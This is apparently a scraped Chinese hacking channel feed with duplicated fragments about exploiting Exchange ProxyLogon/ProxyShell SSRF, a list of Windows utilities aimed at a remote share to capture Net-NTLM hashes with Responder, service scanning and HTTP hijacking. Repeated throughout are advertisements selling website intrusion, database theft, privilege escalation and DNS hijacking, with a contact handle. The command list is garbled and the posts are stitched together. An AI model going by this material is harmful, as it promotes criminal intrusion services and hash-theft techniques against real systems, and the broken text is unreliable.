<init-param>
<param-name>ignorePattern</param-name>
<param-value>^/api/guest$</param-value>
</init-param>
Exchange EWS接口的利用
最近出来了几个Exchange preauth的漏洞,有Proxylogon、Proxyshell。简单看了下,本质都是SSRF,然后通过SSRF调用一些需要授权的接口进行GetShell。如果不进行GetShell,又或者是GetShell失败时,如何利用上面的SSRF去获取邮件内容等操作,又或者只有NTLM HASH时,无法解密出密码时,如何依然去做同样的Exchange的操作。
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
<param-name>ignorePattern</param-name>
<param-value>^/api/guest$</param-value>
</init-param>
Exchange EWS接口的利用
最近出来了几个Exchange preauth的漏洞,有Proxylogon、Proxyshell。简单看了下,本质都是SSRF,然后通过SSRF调用一些需要授权的接口进行GetShell。如果不进行GetShell,又或者是GetShell失败时,如何利用上面的SSRF去获取邮件内容等操作,又或者只有NTLM HASH时,无法解密出密码时,如何依然去做同样的Exchange的操作。
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤1👍1
我们使用以下命令也可以在responder中获取到Net-NTLMHash值:
netexe use hostshare
attrib.exe hostshare
bcdbootexe hostshare
bdeunlockexe hostshare
cacls.exe hostshare
certreqexe hostshare #noisypops anerror dialog)
certutil.exe hostshare
cipher.exe hostshare
>ClipUp.exe -hostshare
cmdl32.exe hostshare
cmstp.exe /s hostshare
colorcpl.exe hostshare #noisy pops anerror dialog)
comp.exe /N=0 hostshare hostsharecompact.exe hostshare
control.exe hostshare
convertvhd.exe source hostshare
destination hostshare
Defragexe hostshare
S diskperfexe hostshare
dispdiagexe-out lhostshare
正在拿站中 新伙伴拿上你的站点来咨询
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
netexe use hostshare
attrib.exe hostshare
bcdbootexe hostshare
bdeunlockexe hostshare
cacls.exe hostshare
certreqexe hostshare #noisypops anerror dialog)
certutil.exe hostshare
cipher.exe hostshare
>ClipUp.exe -hostshare
cmdl32.exe hostshare
cmstp.exe /s hostshare
colorcpl.exe hostshare #noisy pops anerror dialog)
comp.exe /N=0 hostshare hostsharecompact.exe hostshare
control.exe hostshare
convertvhd.exe source hostshare
destination hostshare
Defragexe hostshare
S diskperfexe hostshare
dispdiagexe-out lhostshare
正在拿站中 新伙伴拿上你的站点来咨询
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍1
我们得到了一份详细的系统扫描报告,从报告中我们可以发现系统提供的各种服务及版本,通过这些版本我们能够找到对应的漏洞信息,从而利用这些软件的漏洞对系统进行攻击。
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍2
这个过程需要把磁盘上的庞大的漏洞数据读入内存中,需要时间比较久,大概10-20分钟,但一次执行后续搜索都会很快,注意这个命令会立刻返回,但会在后台运行,耐心等待15-20分钟后再执行 search 命令就可以了。
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍2
HTTP劫持
大家平时上网的时候,在网页的一脚有时候会出现一些小广告,有时候这些广告,不是访问的站点为了盈利而投放的广告,而是第三方的运营商提供的,类似这种
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
大家平时上网的时候,在网页的一脚有时候会出现一些小广告,有时候这些广告,不是访问的站点为了盈利而投放的广告,而是第三方的运营商提供的,类似这种
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
❤3